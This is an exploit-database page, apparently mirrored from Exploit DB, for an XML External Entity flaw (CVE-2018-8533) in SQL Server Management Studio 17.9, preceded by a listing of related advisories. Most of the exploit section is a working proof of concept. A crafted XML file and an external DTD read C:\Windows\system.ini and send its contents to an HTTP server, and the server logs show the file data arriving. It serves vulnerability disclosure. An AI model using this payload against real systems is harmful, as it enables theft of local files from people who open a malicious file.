Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection Vulnerability

🗓️ 11 Oct 2018 00:00:00Reported by hyp3rlinxType

zdt🔗 0day.today👁 48 Views

Microsoft SQL Server 17.9 - XML Injection Vulnerabilit

Reporter	Title	Published	Views	Family All 23
ATTACKERKB	CVE-2018-8532	10 Oct 201813:29	–	attackerkb
ATTACKERKB	CVE-2018-8533	10 Oct 201813:29	–	attackerkb
ATTACKERKB	CVE-2018-8527	10 Oct 201813:29	–	attackerkb
BDU FSTEC	The vulnerability of Microsoft SQL Server Management Studio’s database management tool lies in the insufficient restriction on XML references to external objects, which allows attackers to exploit this to disclose sensitive information.	9 Nov 201800:00	–	bdu_fstec
Circl	CVE-2018-8533	11 Oct 201800:00	–	circl
CNVD	Microsoft SQL Server Management Studio Information Disclosure Vulnerability	10 Oct 201800:00	–	cnvd
Check Point Advisories	Microsoft SQL Server Management Studio XXE Injection Information Disclosure (CVE-2018-8527; CVE-2018-8532; CVE-2018-8533)	18 Nov 201800:00	–	checkpoint_advisories
CVE	CVE-2018-8533	10 Oct 201813:00	–	cve
Cvelist	CVE-2018-8533	10 Oct 201813:00	–	cvelist
Exploit DB	Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection	11 Oct 201800:00	–	exploitdb

# Exploit Title: Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection
# Author: John Page (aka hyp3rlinx) 
# Website: hyp3rlinx.altervista.org
# Venodor: www.microsoft.com
# Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4) 
# CVE: CVE-2018-8533
# References: 
# http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt
# https://www.zerodayinitiative.com/advisories/ZDI-18-1133/
# https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533
 
# Description
# This vulnerability allows remote attackers to disclose sensitive information on vulnerable 
# installations of Microsoft SQL Server Management Studio. User interaction is required to 
# exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
 
# The specific flaw exists within the handling of REGSRVR files. Due to the improper 
# restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the 
# XML parser to access the URI and embed the contents back into the XML document for further processing.
# An attacker can leverage this vulnerability to disclose information in the context of the current process.
 
# Exploit/POC
 
# 1) python -m SimpleHTTPServer
 
# 2) "POC.xml"
 
<?xml version="1.0"?>
<!DOCTYPE injectme [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
 
# 3) "payload.dtd"
 
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;
 
# Result:
 
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -
127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 -

#  0day.today [2018-10-11]  #

11 Oct 2018 00:00Current

5.8Medium risk

Vulners AI Score5.8

EPSS0.4785